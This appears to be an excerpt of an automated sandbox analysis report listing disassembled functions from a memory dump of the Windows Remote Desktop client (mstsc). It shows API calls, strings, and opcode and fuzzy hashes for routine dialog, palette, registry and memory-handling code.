                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00003328,?,?,?,00936947,?,?,00936570,00003327,?,?,?,?,?), ref: 009369B5
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00003330,?,?,?,?,00936454,00000110,?), ref: 009369C4
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000332F,?,?,?,?,00936454,00000110,?), ref: 009369D8
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00003329,?,?,?,?,00936454,00000110,?), ref: 009369EC
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000332A,?,?,?,?,00936454,00000110,?), ref: 009369FD
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000332B,?,?,?,?,00936454,00000110,?), ref: 00936A0E
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000332C,?,?,?,?,00936454,00000110,?), ref: 00936A1F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ButtonChecked
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1719414920-0
                                                                                                                                                                                    • Opcode ID: 3840a663c8d5bd2f1934fcfa909cf587a7c40439998e56de20e1321e15480a23
                                                                                                                                                                                    • Instruction ID: a6e5f46c0d78c5111413bb45e0f181513f3e1cc1bedaadaf301eca5bfb462ceb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3840a663c8d5bd2f1934fcfa909cf587a7c40439998e56de20e1321e15480a23
                                                                                                                                                                                    • Instruction Fuzzy Hash: F6119032A40713B7EB265FA59C94B13AEADAF14754F218034F904F60E0DBA1DE619A94
                                                                                                                                                                                    Function 0094A2F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?), ref: 0094A325
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 0094A366
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0094A385
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0094A3AB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • mstsc.chm, xrefs: 0094A308
                                                                                                                                                                                    • CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32, xrefs: 0094A319
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                    • String ID: CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32$mstsc.chm
                                                                                                                                                                                    • API String ID: 1800380464-1505127495
                                                                                                                                                                                    • Opcode ID: 305a40ebb4acfab462967b8edd4244c3c5c8e0a88baf3463566cd3750ad97399
                                                                                                                                                                                    • Instruction ID: 4af20e9ee1d4c22b8e38f1c6b71e08bd0f5cfb7a38f02124f41ae03321af6b66
                                                                                                                                                                                    • Opcode Fuzzy Hash: 305a40ebb4acfab462967b8edd4244c3c5c8e0a88baf3463566cd3750ad97399
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B2172B0A4421CEFDB219F60DC85FEB77BCEB55304F1002A9F845E2140EBB19E849A91
                                                                                                                                                                                    Function 0093A2CE Relevance: 10.5, APIs: 7, Instructions: 47windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001397), ref: 0093A2E5
                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,0093927F), ref: 0093A2EC
                                                                                                                                                                                    • SendMessageW.USER32(?,0000041E,00000000,00000000), ref: 0093A30D
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 0093A319
                                                                                                                                                                                    • CreateDialogIndirectParamW.USER32(00000110,?,?,?,?), ref: 0093A347
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0093A356
                                                                                                                                                                                    • SetFocus.USER32 ref: 0093A362
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendWindow$CreateDestroyDialogFocusIndirectItemParamShow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 820276176-0
                                                                                                                                                                                    • Opcode ID: 1d71e4b972372193d96cd2adecd64cbe8ca544bb3fa57fc321234402ef96794f
                                                                                                                                                                                    • Instruction ID: 199d41a9c250d1a81a5d64672f152c7a0af9a8521e55f219807b47e63d00a809
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d71e4b972372193d96cd2adecd64cbe8ca544bb3fa57fc321234402ef96794f
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2115772254700AFDB725B61EC09BA77AA5FB89B06F04881CF29A951B0CBB0A400EF05
                                                                                                                                                                                    Function 0093B8B6 Relevance: 10.5, APIs: 7, Instructions: 44windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 0093B8CD
                                                                                                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0093B8DF
                                                                                                                                                                                    • RealizePalette.GDI32(00000000), ref: 0093B8E9
                                                                                                                                                                                    • UpdateColors.GDI32(00000000,?,00939186,?,?,?), ref: 0093B8F0
                                                                                                                                                                                    • UpdateWindow.USER32 ref: 0093B8F9
                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 0093B90A
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0093B914
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Palette$SelectUpdate$ColorsRealizeReleaseWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1473888637-0
                                                                                                                                                                                    • Opcode ID: 18d9ef681cb386817389063d541295644e412d6ee3a0dbed96bb75bf91d72219
                                                                                                                                                                                    • Instruction ID: 5f9ba826448bbae325b6c59a069bd31dd8db14e2232efa94357e05e283eb3de2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18d9ef681cb386817389063d541295644e412d6ee3a0dbed96bb75bf91d72219
                                                                                                                                                                                    • Instruction Fuzzy Hash: EB01D1B1529514BFC7115B61DD0CF6AFBACFF06315F014128F609C1020CBB1A911EFA0
                                                                                                                                                                                    Function 0092306B Relevance: 9.3, APIs: 2, Strings: 4, Instructions: 343COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0094C46B: ??2@YAPAXI@Z.MSVCRT ref: 0094C474
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,0091396B,00000000,00000000,?,?,00901B90,?,00000400,?,?,?), ref: 009232F6
                                                                                                                                                                                    • memset.MSVCRT ref: 0092331E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0091D606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000A,0091396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00943B87), ref: 0091D673
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$??2@AddressHandleLibraryLocalMessageModuleProcTracememset
                                                                                                                                                                                    • String ID: %s\%s$Addins$Default$Name
                                                                                                                                                                                    • API String ID: 1854944580-3070058336
                                                                                                                                                                                    • Opcode ID: e5513bd396d5c49bc752916f2943a33fb5b66ac360deae75187cf45f9061f297
                                                                                                                                                                                    • Instruction ID: b2d1dee77e68ce2d3ad7e64d0cef167a944addbd305a0f9f231f930e4eab051d
                                                                                                                                                                                    • Opcode Fuzzy Hash: e5513bd396d5c49bc752916f2943a33fb5b66ac360deae75187cf45f9061f297
                                                                                                                                                                                    • Instruction Fuzzy Hash: F7C115727043546FDB29DF64EC55FA677BAAB49300F1480D8E500AB1AADA79CF809F41
                                                                                                                                                                                    Function 0095339D Relevance: 9.2, APIs: 6, Instructions: 192memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 009533E0
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000800), ref: 00953424
                                                                                                                                                                                    • memset.MSVCRT ref: 0095347D
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    • memset.MSVCRT ref: 00953492
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,-00000001), ref: 009535E1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Local$ActivityAllocControlEventFreeMessageTrace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 432507534-0
                                                                                                                                                                                    • Opcode ID: c4432918c4683276b64242ac5770647f0d0b16e4e7f5343aafc829b6627e8214
                                                                                                                                                                                    • Instruction ID: 780168a170578f9693b80230b9d847b79b92c9e1438c40f3dc60a288db9b9f95
                                                                                                                                                                                    • Opcode Fuzzy Hash: c4432918c4683276b64242ac5770647f0d0b16e4e7f5343aafc829b6627e8214
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B6135715003049ADB36CF65CC89B6A37ADEB49380F048099FD0997262D671CF89EF61
                                                                                                                                                                                    Function 0094FC9A Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 132memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,00000000,00000000,?,00000000,?,?), ref: 0094FD7D
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0094FE27
                                                                                                                                                                                      • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$ActivityAllocControlEventFree_vsnwprintf
                                                                                                                                                                                    • String ID: %s\%s$Memory allocation failed$Servers$StringCchPrintf failed
                                                                                                                                                                                    • API String ID: 3268872356-1330720887
                                                                                                                                                                                    • Opcode ID: 973ca5aa19e5da419b8faa6b05308025b2a81a78492699c92efe4e8a4f7d2de0
                                                                                                                                                                                    • Instruction ID: bab6ee15481c0a2857a95b691e66dc98e7e2804b6000b88b12ff7119bb007bee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 973ca5aa19e5da419b8faa6b05308025b2a81a78492699c92efe4e8a4f7d2de0
                                                                                                                                                                                    • Instruction Fuzzy Hash: DD41F832B043466FDB169F94D869F2B7BAAEB89305F160068F500AB1F3DBB1CD409B51
                                                                                                                                                                                    Function 0092E49E Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 117memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00943390: LocalFree.KERNEL32(?,?,00913402,00000001,00901B90,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0094339C
                                                                                                                                                                                    • memset.MSVCRT ref: 0092E4EC
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0092E52D
                                                                                                                                                                                      • Part of subcall function 0094BFCD: LoadLibraryW.KERNEL32(crypt32.dll,00000000,00000000,00000200,0092E57B), ref: 0094BFFE
                                                                                                                                                                                      • Part of subcall function 0094BFCD: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0094C014
                                                                                                                                                                                      • Part of subcall function 0094BFCD: GetLastError.KERNEL32 ref: 0094C034
                                                                                                                                                                                      • Part of subcall function 0094BFCD: FreeLibrary.KERNEL32(00000000), ref: 0094C0B9
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?), ref: 0092E599
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0092E5D0
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0092E624
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLocal$Library$AddressAllocErrorLastLoadProcmemcpymemset
                                                                                                                                                                                    • String ID: Password 51
                                                                                                                                                                                    • API String ID: 2249177944-3933498968
                                                                                                                                                                                    • Opcode ID: 12ec4da81bcffd7c2820f608d61fdcca50e90f098187a913a0a974ced5ff72d2
                                                                                                                                                                                    • Instruction ID: 2227f4dfd07824bc77f7b04cd5e251b42b74559f7c4acc0e2ebe821cdada2649
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12ec4da81bcffd7c2820f608d61fdcca50e90f098187a913a0a974ced5ff72d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: B5418070A0122D9FDB20AB64EC98BE9B7B9EF94304F100195F805A7251DB709E81CF91
                                                                                                                                                                                    Function 00918C97 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadCursorW.USER32 ref: 00918D47
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00918D4E
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00918D75
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 00918DBD
                                                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 00918DCA
                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00918DD3
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CursorShow$??2@AddressForegroundFreeHandleLibraryLoadMessageModuleProcTrace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1895109922-0
                                                                                                                                                                                    • Opcode ID: 555439134a615336bb55a494cc72a8aad99635fc3ef991f75d0e36fde09ba422
                                                                                                                                                                                    • Instruction ID: 5305cfc2ea85ec9c06f5cc950e43aa64975701502160d466bba13e12d4475689
                                                                                                                                                                                    • Opcode Fuzzy Hash: 555439134a615336bb55a494cc72a8aad99635fc3ef991f75d0e36fde09ba422
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1941A279704704AFDB259F65EC18BA37BEAAF98300F20091DF586861E1CF71D881EB51
                                                                                                                                                                                    Function 00911297 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,00000000,00000022,00003AB3), ref: 009112EE
                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 00911317
                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 00911334
                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 00911348
                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(00000000,Module), ref: 0091137B
                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(00000000), ref: 0091137E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy_s
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1502251526-0
                                                                                                                                                                                    • Opcode ID: 37a55fb0aa19c2727b4b785de9f89438f89c86f577e5a04c8edf98c1b110eccc
                                                                                                                                                                                    • Instruction ID: a38e08778528605bb78058bb05c8fca4947175da84227b662ca06cc6510976f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37a55fb0aa19c2727b4b785de9f89438f89c86f577e5a04c8edf98c1b110eccc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50310872B0011D7BDB14DF6CDC85AFEB7ADEB84310F04822AFA15D7244DA749A418B94
                                                                                                                                                                                    Function 0093F9A4 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CheckRadioButton.USER32(?,000033B8,000033BA,000033B8), ref: 0093FA72
                                                                                                                                                                                    • CheckRadioButton.USER32(?,000033BD,000033BE,?), ref: 0093FA88
                                                                                                                                                                                    • GetDlgItem.USER32(?,000033BD), ref: 0093FA9E
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0093FAA7
                                                                                                                                                                                    • GetDlgItem.USER32(?,000033BE), ref: 0093FAB3
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0093FAB6
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ButtonCheckEnableItemRadioWindow$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3061383565-0
                                                                                                                                                                                    • Opcode ID: 410de0c0cb818a16d07cfce0efbc00f33df2fcc653c7711b90ebb775d4bb7955
                                                                                                                                                                                    • Instruction ID: 995dcfa5ff7ac2c01a66a0e76755b3af7e83cb5055026a7eb4083307fca1ccfb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 410de0c0cb818a16d07cfce0efbc00f33df2fcc653c7711b90ebb775d4bb7955
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76313832E043086FDB219B54DC58F66BBDEEB44350F150075F908DB2A1DA75DD81AF90
                                                                                                                                                                                    Function 009368A0 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CheckDlgButton.USER32(?,00003328,?), ref: 009368C8
                                                                                                                                                                                    • CheckDlgButton.USER32(?,00003330,?), ref: 009368DB
                                                                                                                                                                                    • CheckDlgButton.USER32(?,0000332F,?), ref: 009368EE
                                                                                                                                                                                    • CheckDlgButton.USER32(?,00003329,?), ref: 00936902
                                                                                                                                                                                    • CheckDlgButton.USER32(?,0000332A,?), ref: 00936917
                                                                                                                                                                                    • CheckDlgButton.USER32(?,0000332B,?), ref: 0093692A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ButtonCheck
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 83588225-0
                                                                                                                                                                                    • Opcode ID: 320b9ecf7f3d0e45e2a6c2782bf8f576c13def4e1d32bdf155f488854405932e
                                                                                                                                                                                    • Instruction ID: 209b819cab7a9e99837cf026cacf515e03d777a47a438eca96557e7d2826ca6a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 320b9ecf7f3d0e45e2a6c2782bf8f576c13def4e1d32bdf155f488854405932e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 810188B27706147BEF055E09DCC2D773A5EEF883207154166F900DE2D5CEA9DE218A50
                                                                                                                                                                                    Function 00951993 Relevance: 9.1, APIs: 6, Instructions: 54timewindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • timeGetTime.WINMM ref: 0095199D
                                                                                                                                                                                    • timeKillEvent.WINMM(?), ref: 009519B0
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,?), ref: 009519CD
                                                                                                                                                                                    • PostMessageW.USER32 ref: 009519DC
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0095198A,?), ref: 009519E3
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,?), ref: 00951A15
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Windowtime$??3@EventKillMessagePostTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2170417897-0
                                                                                                                                                                                    • Opcode ID: 6de0df93daa67d7b1fcef96075eab01f24291c4b984520cbd7e24e0ff1672c9b
                                                                                                                                                                                    • Instruction ID: 0c86970a3b4caa6b0378744810eed9871d440609e99586fc47e3b1f655d893f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6de0df93daa67d7b1fcef96075eab01f24291c4b984520cbd7e24e0ff1672c9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66114C72114600FFDB219FA5DC09F6ABBBAFB0C311F104A0DF68692560CB72B810EB54
                                                                                                                                                                                    Function 0093B928 Relevance: 9.0, APIs: 6, Instructions: 40windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 0093B940
                                                                                                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0093B952
                                                                                                                                                                                    • RealizePalette.GDI32(00000000), ref: 0093B95C
                                                                                                                                                                                    • UpdateColors.GDI32(00000000,?,?,?,0091FF75,?), ref: 0093B963
                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 0093B974
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0093B97E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Palette$Select$ColorsRealizeReleaseUpdate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1468195242-0
                                                                                                                                                                                    • Opcode ID: a8c62a3ca99c4754dff9d4a5ee5b8a3ec1f1367d18fafcd874ed42097f67f134
                                                                                                                                                                                    • Instruction ID: b9d99d4a008a78e59d527065bb3cf03ca9807279a7e3247acdd74da1a8a2161c
                                                                                                                                                                                    • Opcode Fuzzy Hash: a8c62a3ca99c4754dff9d4a5ee5b8a3ec1f1367d18fafcd874ed42097f67f134
                                                                                                                                                                                    • Instruction Fuzzy Hash: 63F049B2129614BBC7215F65DC0CFAABBACFF46759F058129F609C2510CBB1E911DBE0
